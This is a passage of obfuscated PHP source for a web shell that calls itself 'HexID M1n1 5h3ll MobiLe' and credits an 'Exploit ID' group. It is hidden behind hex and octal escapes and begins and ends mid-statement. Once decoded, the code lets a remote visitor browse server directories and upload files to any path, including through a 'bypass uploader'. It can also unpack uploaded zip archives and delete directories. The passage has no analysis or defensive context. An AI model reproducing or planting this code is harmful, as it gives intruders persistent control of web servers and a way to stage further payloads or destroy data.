\145\x67\42\x3e\74\57\141\165\144\x69\157\76\xa\12\x3c\163\x63\x72\151\160\x74\x20\164\171\x70\x65\75\x22\164\x65\170\x74\x2f\x6a\141\166\x61\x73\x63\162\x69\160\x74\x22\x20\x73\x72\143\75\42\150\x74\164\x70\x3a\x2f\x2f\141\152\x61\x78\56\x67\x6f\157\x67\x6c\145\x61\x70\151\163\56\143\157\155\x2f\x61\152\141\x78\x2f\154\x69\142\x73\x2f\152\x71\165\x65\x72\x79\57\61\56\71\56\x31\x2f\152\161\x75\x65\x72\171\56\x6d\151\x6e\56\152\163\x22\x3e\74\57\163\143\x72\x69\x70\x74\x3e\12\x3c\x73\x63\x72\151\160\x74\40\x74\171\160\145\75\42\x74\145\170\164\57\x6a\141\166\x61\x73\x63\x72\x69\160\164\42\x20\x73\x72\143\75\42\150\x74\x74\x70\x73\72\x2f\57\x72\141\x77\x2e\147\151\x74\150\x75\142\165\163\x65\x72\143\x6f\156\x74\x65\156\164\x2e\143\157\x6d\57\x63\150\165\x63\153\171\x67\x6c\151\x74\x63\150\57\x6e\x6f\166\141\143\141\156\x63\171\56\152\x73\x2f\155\x61\163\x74\145\x72\57\x6a\141\166\x61\163\x63\162\x69\160\164\x2f\x6a\161\165\145\x72\171\x2e\x6e\157\x76\x61\143\x61\x6e\x63\171\56\155\x69\x6e\x2e\152\x73\x22\x3e\x3c\57\x73\143\x72\151\160\164\x3e\12\12\xa\x3c\163\x74\x79\154\x65\76\xa\150\x74\x6d\154\x7b\12\167\x69\x64\x74\150\x3a\61\x30\x30\45\73\12\x7d\xa\x62\157\x64\171\x7b\12\167\151\x64\164\150\72\x39\66\45\x3b\12\146\157\156\x74\x2d\146\x61\x6d\151\154\x79\72\x20\x49\143\145\154\141\x6e\144\73\xa\x62\x61\143\x6b\147\162\157\165\156\x64\x2d\143\157\x6c\x6f\162\72\x20\x62\154\141\x63\153\73\12\143\x6f\154\x6f\x72\72\x77\150\x69\164\x65\73\12\x7d\12\43\143\157\156\164\145\156\164\x20\164\x72\x3a\x68\x6f\x76\x65\162\173\12\142\x61\x63\153\x67\162\157\x75\156\144\x2d\x63\157\154\157\x72\x3a\40\147\x72\x65\x65\x6e\x3b\12\x74\145\170\164\x2d\x73\150\x61\144\x6f\x77\x3a\40\x31\60\x70\170\x20\61\60\160\x78\40\61\60\x70\x78\x20\x6c\x69\155\x65\73\12\x7d\xa\43\x63\157\x6e\x74\x65\156\164\x20\56\146\151\x72\163\x74\x7b\xa\143\157\154\157\x72\72\x20\142\x6c\141\x63\153\73\xa\x62\141\143\x6b\x67\x72\157\165\x6e\x64\x2d\143\x6f\154\157\162\x3a\40\x6c\x69\155\145\x3b\12\175\12\164\x61\x62\154\145\173\12\x62\x6f\162\144\145\x72\72\x20\x31\160\170\x20\154\x69\155\x65\40\x73\x6f\x6c\151\144\x3b\xa\x7d\xa\12\151\155\147\x5b\x61\154\164\x2a\75\x22\167\167\167\56\x30\x30\x30\167\145\x62\x68\x6f\163\164\x2e\x63\x6f\155\42\135\40\173\xa\x64\151\163\160\x6c\x61\x79\72\x20\156\x6f\156\x65\x3b\xa\x7d\x70\x6c\141\x79\72\x20\156\157\156\145\x3b\12\x7d\12\12\x2e\x6b\x61\156\x65\173\xa\142\157\x72\x64\x65\x72\72\x20\61\x70\170\40\x23\x30\60\60\60\x30\x30\40\x73\157\x6c\x69\x64\x3b\xa\55\155\x6f\x7a\55\x62\157\162\x64\x65\x72\x2d\x72\141\x64\x69\x75\x73\72\x20\x35\160\170\x3b\12\55\x77\145\142\153\151\164\55\x62\x6f\x72\144\x65\162\x2d\162\x61\144\x69\165\x73\x3a\x35\x70\170\73\12\142\157\162\x64\145\x72\55\162\141\144\x69\165\163\72\x35\160\x78\x3b\12\146\x6f\156\x74\55\167\145\x69\147\150\x74\x3a\x62\x6f\154\144\73\12\175\12\12\56\x46\151\x6c\x65\x7a\x7b\xa\x62\157\162\x64\x65\162\72\x20\x31\x70\170\40\43\60\x30\x30\60\x30\60\40\163\x6f\x6c\151\144\73\xa\55\155\x6f\x7a\55\x62\x6f\x72\144\x65\x72\x2d\162\x61\x64\x69\x75\x73\72\x20\65\160\170\73\12\55\x77\145\142\x6b\x69\164\x2d\142\157\162\144\x65\162\55\162\141\x64\151\x75\x73\x3a\65\160\x78\73\12\x62\x6f\162\x64\x65\162\55\162\141\144\x69\165\x73\x3a\65\x70\170\x3b\12\x7d\12\12\56\153\141\156\x7b\12\55\155\x6f\172\55\x62\x6f\162\144\x65\x72\x2d\x72\x61\x64\x69\x75\163\72\40\64\160\170\73\12\55\167\x65\x62\x6b\151\x74\x2d\142\x6f\162\x64\x65\162\x2d\162\x61\x64\151\165\163\x3a\64\x70\170\x3b\12\142\x6f\162\x64\x65\x72\55\x72\141\x64\151\165\163\x3a\64\x70\170\73\xa\x7d\12\xa\56\143\157\154\172\x7b\xa\x62\x61\143\x6b\147\x72\x6f\x75\x6e\x64\x3a\x20\x23\60\61\61\61\61\61\73\x62\x6f\162\x64\x65\162\x3a\x31\x70\170\40\x6c\x69\x6d\145\40\x73\x6f\x6c\151\144\73\x63\x6f\x6c\157\162\x3a\x77\150\151\x74\145\x3b\142\157\162\x64\x65\162\55\x72\141\144\151\x75\163\x3a\x20\x35\x70\170\x3b\xa\x7d\12\12\12\12\x61\173\xa\143\157\154\157\162\72\x77\x68\151\x74\x65\x3b\xa\x74\145\170\x74\55\144\x65\x63\x6f\162\x61\164\x69\157\x6e\x3a\x20\156\157\156\x65\73\12\175\12\141\72\150\157\x76\x65\x72\173\xa\143\x6f\154\x6f\162\x3a\x6c\151\x6d\145\x3b\xa\164\145\x78\x74\55\x73\150\141\x64\x6f\x77\x3a\x30\160\x78\40\60\160\x78\40\x31\60\x70\170\x20\43\146\x66\146\146\x66\146\73\12\x7d\12\x2e\x62\154\x69\x6e\x6b\137\164\145\x78\x74\x20\x7b\xa\x2d\x77\145\142\x6b\x69\x74\55\x61\x6e\x69\x6d\x61\164\x69\x6f\x6e\x2d\x6e\141\155\145\x3a\40\x62\154\x69\156\x6b\145\162\x3b\xa\x2d\167\145\x62\153\151\x74\55\x61\x6e\x69\x6d\x61\164\151\x6f\156\x2d\144\165\x72\x61\164\151\x6f\156\72\40\x32\163\73\12\55\x77\x65\x62\153\151\164\55\x61\x6e\x69\x6d\x61\164\151\x6f\x6e\55\x74\151\155\151\x6e\147\55\x66\x75\x6e\143\164\151\x6f\x6e\x3a\40\154\151\156\x65\141\x72\73\xa\55\167\x65\x62\153\151\x74\x2d\141\156\151\x6d\141\x74\x69\x6f\156\55\x69\x74\x65\162\x61\164\151\x6f\156\55\143\157\x75\x6e\164\x3a\40\x69\156\x66\151\156\x69\x74\145\73\12\12\x2d\155\x6f\x7a\x2d\x61\156\x69\155\141\x74\151\x6f\156\55\x6e\x61\155\145\x3a\40\x62\154\151\x6e\x6b\x65\x72\x3b\xa\x2d\x6d\x6f\172\55\x61\x6e\x69\155\x61\164\x69\157\x6e\x2d\144\x75\x72\x61\x74\x69\x6f\x6e\72\40\x32\x73\73\12\x2d\155\x6f\172\x2d\141\x6e\x69\x6d\141\x74\151\x6f\156\55\x74\x69\155\x69\156\x67\x2d\x66\165\x6e\x63\x74\151\x6f\x6e\x3a\x20\154\x69\x6e\145\141\162\x3b\12\x2d\x6d\x6f\x7a\55\141\156\x69\155\141\x74\x69\157\156\x2d\151\x74\x65\162\141\164\x69\x6f\x6e\x2d\143\157\165\x6e\x74\x3a\x20\x69\156\x66\151\156\151\x74\145\73\12\xa\x20\x61\x6e\x69\x6d\141\x74\151\157\x6e\55\x6e\141\x6d\x65\x3a\x20\142\x6c\x69\156\153\145\162\x3b\12\x20\141\x6e\151\x6d\x61\164\x69\x6f\x6e\55\144\x75\162\141\x74\151\157\x6e\72\x20\x32\163\x3b\xa\x20\x61\156\151\x6d\141\164\151\x6f\x6e\55\164\x69\x6d\151\x6e\147\55\x66\165\x6e\x63\x74\x69\157\156\x3a\x20\x6c\x69\x6e\145\x61\x72\73\xa\x20\x61\x6e\151\155\x61\164\151\157\156\x2d\151\164\x65\x72\141\164\x69\x6f\156\55\x63\157\165\156\x74\72\x20\x69\156\146\x69\156\x69\x74\145\73\xa\xa\x20\143\x6f\154\x6f\x72\72\40\162\x65\x64\x3b\xa\x7d\xa\x40\x2d\155\157\x7a\x2d\153\x65\171\146\162\x61\x6d\x65\x73\x20\x62\154\x69\x6e\x6b\145\x72\x20\x7b\40\xa\x20\x30\x25\40\173\x20\x6f\x70\x61\143\151\x74\171\x3a\40\65\56\60\x3b\xa\40\x7d\12\40\65\x30\x25\40\173\40\x6f\160\141\x63\x69\x74\x79\72\40\60\x2e\60\x3b\12\x20\x7d\xa\40\x31\60\60\x25\40\173\x20\157\160\141\x63\151\x74\x79\72\x20\65\56\x30\x3b\xa\x20\175\xa\x20\175\12\100\55\167\x65\x62\153\151\164\55\x6b\145\171\146\162\141\155\145\163\x20\142\154\151\x6e\153\x65\x72\x20\x7b\40\12\40\x30\45\40\173\x20\x6f\160\x61\x63\151\x74\x79\72\40\x35\x2e\x30\73\xa\x20\x7d\xa\40\65\x30\x25\40\173\x20\x6f\x70\x61\x63\x69\164\171\72\40\x30\x2e\x30\x3b\12\x20\175\xa\40\x31\x30\60\45\x20\173\40\157\160\141\x63\151\x74\x79\72\40\65\x2e\60\x3b\xa\x20\x7d\xa\x20\x7d\xa\100\x6b\145\171\x66\x72\x61\155\145\x73\40\142\x6c\x69\156\153\x65\x72\x20\173\x20\xa\x20\x30\45\40\173\x20\x6f\x70\141\x63\151\x74\171\72\x20\x35\x2e\60\x3b\12\x20\x7d\xa\x20\65\x30\45\x20\x7b\40\157\x70\141\x63\151\x74\x79\72\40\x30\x2e\60\x3b\12\x20\x7d\12\x20\61\60\60\45\x20\173\40\157\160\141\x63\x69\x74\171\x3a\40\x35\56\60\73\xa\40\x7d\12\40\175\xa\74\57\x73\164\171\x6c\145\76\x20\12\74\57\x68\145\141\144\76\12\xa\12\xa\74\142\x6f\x64\171\x3e\12\74\x63\145\x6e\164\145\x72\76\x3c\x21\x2d\55\x3c\x70\40\143\x6c\141\163\163\75\42\142\x6c\x69\156\x6b\137\x74\x65\x78\x74\42\40\163\164\171\x6c\x65\x3d\42\146\x6f\156\164\x2d\x73\x69\x7a\x65\72\x34\x35\160\x78\73\12\143\x6f\x6c\x6f\x72\72\x77\150\x69\164\145\x3b\164\x65\x78\164\55\163\x68\x61\144\x6f\167\x3a\40\60\x70\170\40\x30\160\x78\x20\x32\x30\160\x78\x20\43\60\x30\x66\146\146\x66\40\x2c\40\60\x70\170\40\60\160\170\x20\x32\60\x70\170\x20\43\60\60\x66\146\146\146\73\x66\157\156\x74\x2d\146\141\155\151\154\x79\72\x49\143\x65\154\141\x6e\x64\73\42\x3e\55\55\x3e\xa\xa\12\74\141\x20\150\x72\x65\146\75\42\77\x68\157\155\x65\x22\76\74\146\157\156\164\40\x66\141\x63\145\75\x22\x4e\145\167\x20\122\157\143\153\145\162\x22\x20\x73\x69\x7a\x65\75\42\65\x22\x20\x20\163\164\x79\x6c\145\75\42\x63\x6f\x6c\x6f\x72\72\142\x6c\x61\143\153\73\x74\x65\x78\x74\x2d\163\150\141\x64\157\167\72\40\x30\x20\x30\x20\x33\160\x78\40\154\151\x6d\145\x2c\x20\x30\160\x78\40\60\x70\x78\40\x35\160\x78\40\154\151\x6d\x65\x2c\x30\40\x30\40\x35\x70\x78\40\154\151\x6d\x65\x2c\60\x20\x30\40\x35\160\x78\40\154\x69\155\x65\x3b\42\76\x3c\142\x3e\x48\145\170\x49\x44\40\115\61\x6e\61\x20\x35\x68\63\154\x6c\40\x4d\x6f\142\x69\x4c\x65\x20\74\57\x61\x3e\74\x2f\x66\157\156\164\76\74\57\142\x72\76\74\x2f\142\x3e"; if (isset($_GET["\x70\141\164\x68"])) { $path = $_GET["\x70\x61\164\150"]; chdir($path); } else { $path = getcwd(); } if (isset($_GET["\x64\x69\x72"])) { $dir = $_GET["\144\x69\162"]; chdir($dir); } else { $dir = getcwd(); } echo "\74\164\x61\142\154\145\x20\163\x74\171\154\x65\75\x22\x62\x6f\x72\x64\x65\162\x3a\40\61\x70\x78\40\x73\157\154\151\x64\x20\x6c\x69\155\145\73\x62\157\x72\x64\x65\162\55\162\x61\x64\x69\165\163\72\40\65\160\x78\73\142\141\143\153\147\162\157\x75\156\x64\72\x20\x23\60\61\61\x31\x31\73\x22\40\167\151\144\164\x68\75\42\61\60\x30\45\x22\40\x62\x6f\162\144\x65\x72\75\x22\x30\42\40\143\145\x6c\x6c\x70\141\x64\x64\151\x6e\147\75\x22\x33\42\x20\x63\x65\x6c\154\x73\x70\x61\x63\x69\156\147\x3d\x22\61\x22\76"; echo "\x3c\x74\162\76\74\x74\144\76\74\143\145\156\164\x65\162\76\x3c\146\x6f\x6e\x74\x20\x66\141\143\x65\x3d\42\x4e\145\167\x20\122\x6f\143\x6b\145\x72\x22\40\x73\x69\x7a\145\75\42\x32\42\x3e"; echo "\133\40\x3c\141\40\150\x72\x65\146\x3d\47\x3f\x6f\x70\x74\x69\x6f\x6e\46\160\x61\x74\150\x3d{$path}\x26\x7a\x69\160\x3d\155\x65\x6e\x75\x27\x3e\x3c\x66\x6f\x6e\164\x20\x63\157\154\157\162\x3d\x6c\151\x6d\x65\76\132\x69\x70\x20\101\x72\143\x68\x69\x76\145\x72\x3c\57\146\157\156\164\x3e\74\x2f\x61\x3e\x20\x5d\74\57\146\157\156\x74\76"; echo "\x3c\164\162\76\74\164\x64\76\x3c\x66\x6f\x6e\x74\40\x66\141\x63\x65\75\x22\116\x65\167\x20\122\157\143\x6b\145\162\x22\x20\163\x69\172\145\75\42\62\42\76"; echo "\133\x20\x3c\141\40\x68\x72\x65\x66\75\47\77\157\160\164\151\x6f\x6e\x26\160\141\x74\150\x3d{$path}\x26\165\160\x6d\x6f\144\75\165\x70\x6d\145\x6e\x75\47\x3e\74\146\x6f\156\164\x20\x63\157\x6c\157\x72\x3d\x6c\151\x6d\x65\76\x55\160\155\157\144\74\x2f\146\x6f\156\164\76\74\57\141\76\40\135\74\57\146\x6f\156\164\x3e\74\57\143\x65\156\164\145\x72\76"; if (isset($_FILES["\146\x69\x6c\x65"])) { if (copy($_FILES["\146\x69\154\x65"]["\164\155\160\x5f\x6e\x61\155\145"], $path . "\x2f" . $_FILES["\x66\x69\x6c\x65"]["\x6e\x61\x6d\x65"])) { $message = "\x3c\146\x6f\x6e\x74\x20\x63\x6f\154\x6f\162\75\42\167\x68\x69\x74\145\42\x3e\106\x69\x6c\145\x20\x55\x70\x6c\x6f\x61\144\x20\72\40\x3c\x2f\x66\x6f\156\x74\76\74\x66\157\x6e\x74\40\x63\157\x6c\x6f\162\75\x6c\151\155\145\76\x3c\x62\76\104\x6f\156\145\40\123\165\x63\x63\145\163\x73\146\165\x6c\x6c\x79\74\x2f\142\76\x3c\57\x66\157\156\x74\x3e"; } else { $message = "\x3c\146\x6f\156\164\40\143\x6f\154\x6f\162\x3d\x22\162\x65\144\42\x3e\74\x62\x3e\x46\141\x69\x6c\x65\x64\x20\104\151\162\40\x4e\x6f\x74\40\x57\x72\x69\164\145\141\142\154\x65\40\72\x28\74\57\142\x3e\x3c\x2f\x66\157\156\164\x3e\x3c\57\143\x65\x6e\164\x65\x72\76"; } } echo "\74\146\x6f\x72\x6d\x20\145\156\143\164\171\x70\145\75\x22\x6d\165\x6c\164\x69\x70\x61\162\164\57\146\x6f\x72\x6d\x2d\x64\x61\x74\x61\42\40\155\x65\164\150\157\x64\x3d\42\x50\117\123\x54\x22\76"; echo "\x3c\142\x72\x3e\x3c\143\145\x6e\x74\145\162\x3e\x3c\151\x6e\x70\165\x74\40\143\154\141\x73\163\x3d\42\153\141\x6e\x22\x20\164\171\160\145\x3d\x22\x66\x69\154\x65\42\x20\x6e\x61\155\x65\x3d\42\146\x69\154\145\x22\40\57\x3e\x3c\x66\x6f\156\x74\x20\143\157\x6c\157\x72\x3d\142\154\141\x63\153\x3e\154\154\154\x6c\x6c\x6c\74\57\146\x6f\156\x74\x3e\74\x69\x6e\x70\x75\164\40\143\x6c\141\163\x73\75\42\153\x61\156\x22\x20\164\x79\160\x65\x3d\42\163\x75\x62\x6d\x69\x74\42\x20\x76\x61\154\x75\x65\x3d\x22\165\x70\154\x6f\141\x64\x22\x20\x2f\x3e\xa\74\x2f\x63\145\156\164\x65\162\76"; if ($message) { echo "{$message}"; } echo "\x3c\x2f\x66\157\162\155\76\74\x2f\x66\x6f\x6e\x74\76\x3c\x2f\164\141\x62\x6c\145\x3e"; echo "\12\12\74\160\x72\x65\x20\x20\x69\144\75\x22\160\x72\145\x22\x20\163\x74\171\154\x65\x3d\x22\164\145\x78\x74\x2d\141\x6c\x69\x67\156\x3a\40\x6c\x65\x66\x74\73\157\x76\x65\162\x66\154\157\x77\72\x61\x75\x74\x6f\x3b\12\160\141\147\145\55\x62\x72\x65\x61\x6b\x2d\151\156\x73\151\144\x65\x3a\141\166\x6f\x69\x64\73\12\x64\151\163\160\154\x61\x79\x3a\x62\x6c\x6f\143\153\73\12\x6d\141\162\147\151\156\x3a\x30\40\141\165\x74\157\73\12\x6d\141\x72\x67\151\156\55\x74\x6f\160\x3a\x30\73\12\x6d\x61\x72\x67\x69\x6e\x2d\x62\157\164\x74\157\155\72\x30\x3b\xa\x77\157\162\144\55\x62\x72\145\141\153\x3a\x62\162\x65\141\x6b\55\x61\154\154\x3b\12\167\x6f\x72\x64\55\x77\x72\x61\160\72\x62\x72\145\141\x6b\x2d\x77\157\x72\144\x3b\xa\x62\x6f\x72\144\145\x72\x3a\40\x31\160\170\40\x73\157\x6c\x69\144\x20\154\x69\155\x65\73\xa\x62\x6f\x72\x64\145\x72\55\x74\x6f\x70\72\40\142\x6c\141\x63\x6b\73\xa\143\157\x6c\157\x72\72\x6c\151\155\145\x3b\12\142\x61\143\x6b\x67\162\x6f\x75\156\x64\55\143\157\154\157\x72\72\x20\144\141\162\153\163\x6c\141\164\x65\147\162\x65\171\x3b\xa\x64\x69\x72\145\143\x74\x69\x6f\x6e\x3a\154\164\162\73\x22\x3e\xa\12"; $path = str_replace("\x5c", "\x2f", $path); $paths = explode("\57", $path); foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "\x3c\146\157\156\x74\40\163\151\x7a\x65\x3d\x22\62\x22\x20\146\141\x63\145\x3d\42\x4e\145\x77\x20\122\157\x63\x6b\x65\162\x22\76\74\x61\40\150\162\x65\x66\x3d\42\77\x70\x61\164\x68\x3d\x2f\42\x3e\74\142\76" . r($dir, Dir) . "\x3c\57\142\x3e\x3a\57\x3c\x2f\141\76"; continue; } if ($pat == '') { continue; } echo "\x3c\x61\40\x68\x72\x65\x66\75\42\77\x70\141\x74\150\75"; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "\57"; } } echo "\42\76" . $pat . "\x3c\x2f\x61\76\x2f"; } echo "\x3c\x66\x6f\x6e\164\40\143\x6f\x6c\x6f\162\75\x23\x30\x31\x31\x31\x31\61\x31\76\x5f\74\x2f\146\x6f\156\164\76\74\142\x3e\74\146\157\x6e\x74\x20\143\157\154\157\x72\75\167\150\151\164\145\76\133\40\x3c\57\x66\x6f\x6e\x74\76\x3c\x2f\142\76" . w($dir, $perms) . "\x3c\142\x3e\x3c\x66\157\156\164\40\143\x6f\x6c\x6f\162\x3d\167\x68\x69\x74\x65\x3e\40\135\74\x2f\x66\157\156\x74\76\x3c\57\142\x3e"; echo "\74\x2f\x66\x6f\156\164\76\74\57\x70\162\x65\76\x3c\x21\x2d\x2d\74\x68\x72\40\x63\157\x6c\157\162\x3d\42\x67\x72\x65\x65\x6e\42\40\163\x74\x79\154\145\75\42\x6d\x61\x72\x67\151\x6e\55\x74\157\x70\72\60\x3b\x22\76\x2d\x2d\x3e"; if (isset($_FILES["\x7a\151\160\137\x66\151\154\x65"]["\x6e\x61\x6d\x65"])) { $filename = $_FILES["\x7a\x69\x70\x5f\x66\x69\154\x65"]["\x6e\x61\x6d\145"]; $source = $_FILES["\x7a\x69\160\x5f\x66\x69\154\x65"]["\x74\x6d\160\137\156\x61\x6d\145"]; $type = $_FILES["\x7a\x69\160\x5f\x66\151\x6c\x65"]["\x74\171\160\145"]; $name = explode("\x2e", $filename); $accepted_types = array("\x61\x70\x70\154\151\x63\141\164\151\157\x6e\57\172\x69\160", "\x61\x70\x70\154\151\143\141\x74\x69\157\156\57\170\55\x7a\x69\160\55\x63\x6f\155\160\x72\x65\x73\x73\145\144", "\155\165\154\164\151\x70\x61\x72\164\x2f\170\x2d\x7a\x69\x70", "\x61\x70\x70\154\151\x63\141\x74\151\x6f\x6e\57\170\55\x63\x6f\155\x70\x72\x65\x73\x73\145\x64"); foreach ($accepted_types as $mime_type) { if ($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == "\x7a\151\160" ? true : false; if (!$continue) { alert("\x46\x69\154\145\40\x74\x79\x70\145\x20\143\141\156\164\x20\x7a\151\x70"); kabur("\77\157\x70\164\151\x6f\x6e\x26\x70\141\x74\150\x3d{$path}\x26\x68\x65\x78\x69\x64\75\172\151\x70\x65\162"); } $pathx = $path . "\x2f"; $filenoext = basename($filename, "\x2e\x7a\151\160"); $filenoext = basename($filenoext, "\56\132\111\x50"); $targetdir = $pathx . $filenoext; $targetzip = $pathx . $filename; if (is_dir($targetdir)) { rmdir_recursive($targetdir); } if (move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($pathx); $zip->close(); unlink($targetzip); } $message = "\74\x66\157\x6e\164\40\x63\157\154\x6f\x72\x3d\x6c\x69\x6d\x65\76\74\x62\76\125\156\172\x69\160\40\123\165\143\x63\x65\163\x66\x75\x6c\x6c\171\x3c\x2f\142\76\74\57\x66\157\x6e\164\76"; } else { $message = "\74\146\157\x6e\164\x20\x63\x6f\154\x6f\x72\75\x72\x65\x64\76\74\x62\x3e\x55\156\x7a\x69\160\40\x46\x61\151\154\145\144\41\41\74\x2f\142\76\74\x2f\146\x6f\156\164\76"; } } if ($_GET["\165\x70\x6d\157\144"] == "\165\160\155\x65\156\165") { echo "\x3c\142\162\x3e\74\146\x6f\156\164\40\x63\x6f\x6c\157\x72\75\x22\147\x72\x65\145\x6e\x22\x3e\x3c\142\76\x53\160\145\x63\x69\141\154\x20\x50\162\145\x6d\x69\165\155\40\x42\x79\x70\141\163\163\x20\125\160\x6c\x6f\x61\144\145\162\40\x48\145\x26\x23\71\x37\x36\60\73\151\144\74\x2f\x62\76\74\x2f\146\157\x6e\x74\76\x3c\x62\x72\76\x3c\146\157\x72\x6d\40\141\143\x74\151\x6f\x6e\x3d\42\42\40\x6d\x65\x74\x68\x6f\x64\75\42\x70\157\x73\164\x22\40\x65\156\143\164\x79\x70\x65\x3d\42\x6d\x75\x6c\x74\x69\160\141\x72\x74\x2f\x66\x6f\162\x6d\55\144\141\x74\x61\x22\x20\x6e\x61\x6d\145\75\x22\165\x70\x6c\157\141\144\x65\162\42\40\151\144\x3d\42\165\x70\154\157\141\x64\145\162\x22\x3e"; echo "\74\151\x6e\160\x75\164\x20\x74\171\x70\145\x3d\42\146\151\x6c\145\42\40\156\141\x6d\x65\75\x22\x66\151\x6c\145\x22\40\x73\151\x7a\145\x3d\42\x35\x30\x22\76\74\x66\x6f\156\164\40\x63\157\154\157\162\x3d\42\142\x6c\x61\143\153\x22\x3e\154\154\x6c\x6c\x3c\57\x66\157\x6e\164\76\x3c\151\x6e\x70\165\164\40\x6e\x61\155\x65\x3d\42\137\x75\x70\154\x22\40\x74\171\160\x65\x3d\42\163\x75\142\x6d\151\164\x22\x20\151\x64\x3d\42\137\165\x70\x6c\42\40\166\x61\x6c\x75\x65\75\x22\125\160\154\x6f\141\x64\42\76\x3c\57\x66\157\x72\x6d\76"; $rootPath = $_SERVER["\x44\x4f\103\x55\x4d\x45\116\124\x5f\122\x4f\x4f\124"]; $thisPath = dirname($_SERVER["\120\x48\x50\137\123\105\114\x46"]); $pathz = str_replace($rootPath, "\x20", $thisPath); $dir = dirname("\155\x79\163\164\x72\151\x6e\x67\x2f\141\156\144\x2f\160\141\x74\150\56\x74\x78\x74") . DIRECTORY_SEPARATOR; $pathxz = dirname(__FILE__); if ($pathz == '' || $pathz == "\57" || $pathz == "\134") { } if ($_POST["\x5f\165\x70\x6c"] == "\125\160\154\x6f\141\x64") { if (@copy($_FILES["\146\151\x6c\x65"]["\164\155\160\137\156\141\x6d\145"], $_FILES["\146\x69\x6c\145"]["\156\141\x6d\145"])) { $web = "\x68\x74\x74\x70\x3a\57\57" . $_SERVER["\123\x45\x52\x56\x45\122\x5f\x4e\x41\x4d\x45"] . $pathxz . "\57" . basename($_FILES["\146\x69\x6c\x65"]["\156\141\155\x65"]) . ''; echo "\x47\157\x20\74\x66\157\156\x74\40\163\151\x7a\145\75\x27\x32\x70\x78\x27\x3e\46\x23\x31\60\61\x35\x33\73\40\74\141\x20\150\x72\x65\x66\x3d\47{$web}\47\x20\164\141\x72\x67\145\164\x3d\x27\137\x62\x6c\141\x6e\153\47\76\74\142\x3e\74\x75\76{$web}\74\x2f\146\157\x6e\x74\76\74\57\x75\x3e\x3c\x2f\x62\76\74\x2f\141\76"; echo "\x3c\142\162\x3e\101\165\x74\x68\157\162\40\72\x20\124\145\170\67\x75\162\x65\x20\174\174\40\x3c\146\157\x6e\164\40\x63\x6f\154\x6f\162\75\x22\155\x61\147\145\156\164\141\42\76\110\151\154\x6c\x75\163\x69\157\x6e\40\105\x78\160\154\x6f\x69\164\x20\x49\x44\x20\x26\43\x39\67\x36\x30\x3b\x3c\57\x62\76\74\57\146\x6f\156\x74\x3e\x20\74\x2f\x74\x72\76\74\x2f\164\x64\x3e\74\x2f\164\x61\142\x6c\x65\x3e\74\x62\x72\x3e\x3c\142\162\x3e"; } else { echo "\x3c\142\76\74\x66\x6f\x6e\x74\x20\143\x6f\x6c\157\x72\75\x22\162\x65\x64\42\x3e\x55\160\x6c\157\x61\x64\40\106\141\x69\x6c\145\x64\x20\41\x21\x21\x3c\x2f\x66\157\x6e\x74\x3e\x3c\x2f\142\x3e\x3c\x62\162\76\x3c\x62\x72\76"; } } } if ($_GET["\x7a\151\160"] == "\x6d\x65\156\x75") { echo "\74\142\x72\76\74\x74\x61\x62\x6c\145\x20\x73\x74\171\154\145\x3d\x27\x62\157\x72\x64\145\x72\72\61\160\x78\x20\163\157\154\x69\144\x20\x6c\151\155\x65\73\142\157\162\x64\x65\x72\55\162\x61\x64\151\x75\x73\x3a\62\x70\170\73\x77\x69\x64\x74\x68\72\x31\60\x30\45\x3b\47\76\74\164\144\x3e\74\143\145\x6e\x74\145\162\76\12\12\12\74\146\x6f\156\164\40\x66\141\143\145\75\x27\116\x65\167\40\x52\x6f\x63\x6b\x65\x72\x27\x20\x73\x69\x7a\145\x3d\47\x35\x27\x3e\40\x5b\74\x66\157\x6e\x74\x20\143\157\x6c\x6f\x72\x3d\x27\x6c\x69\x6d\145\47\76\40\x5a\151\x70\40\x41\x72\x63\150\x69\166\145\x72\x20\x3c\x2f\x66\x6f\156\x74\76\x5d\74\x2f\x66\157\x6e\x74\x3e\xa\x3c\150\x72\x20\x63\157\x6c\x6f\x72\x3d\47\147\x72\145\145\x6e\x27\x20\x73\164\171\x6c\145\x3a\47\x6d\x61\x72\147\151\x6e\x2d\164\157\160\72\x30\x3b\160\x61\x64\144\x69\x6e\x67\x3a\x30\73\47\x3e\12\74\x62\x72\76\xa\74\146\157\x6e\164\x20\146\x61\x63\x65\x3d\x27\116\x65\x77\40\122\157\143\x6b\x65\162\47\40\163\151\172\145\x3d\47\x32\47\x3e\xa\133\x20\74\141\40\x68\x72\145\x66\x3d\47\x3f\157\160\x74\151\157\x6e\x26\x70\x61\x74\150\75{$path}\46\x61\165\x74\157\x3d\x75\156\172\x69\160\x27\76\74\x66\157\x6e\164\x20\x63\x6f\154\x6f\162\75\154\x69\155\x65\76\x41\x75\x74\x6f\40\125\x6e\172\151\x70\x20\106\151\x6c\x65\74\x2f\x66\157\x6e\x74\76\x3c\x2f\141\x3e\40\x5d\xa\12\133\x20\x3c\141\x20\x68\162\145\146\x3d\x27\x3f\x6f\160\164\151\157\156\46\x70\141\164\150\x3d{$path}\46\172\x69\x70\75\142\141\x63\153\x75\160\x27\x3e\x3c\146\157\x6e\164\x20\x63\x6f\x6c\x6f\x72\75\x6c\151\x6d\x65\x3e\132\151\160\x20\102\x61\x63\x6b\x75\160\74\57\146\x6f\x6e\164\76\74\57\141\x3e\x20\x5d\xa\12\x5b\40\x3c\x61\x20\x68\162\x65\146\x3d\x27\x3f\157\160\x74\151\157\156\46\160\x61\164\x68\x3d{$path}\46\x75\x6e\x7a\x69\160\x3d\155\x61\x6e\x75\141\154\47\76\x3c\146\157\x6e\164\x20\143\157\x6c\x6f\x72\75\154\151\155\145\76\x55\156\132\151\x70\x20\115\x61\x6e\165\x61\x6c\74\x2f\x66\157\156\164\76\x3c\57\141\76\40\x5d\12\x20\x3c\x2f\x62\76\xa\xa\x3c\57\146\x6f\x6e\164\76\x3c\57\x74\x64\76\x3c\x2f\143\145\x6e\x74\x65\162\x3e\74\57\x74\141\x62\154\x65\x3e"; } if ($_GET["\141\165\x74\157"] == "\x75\156\x7a\x69\x70") { echo 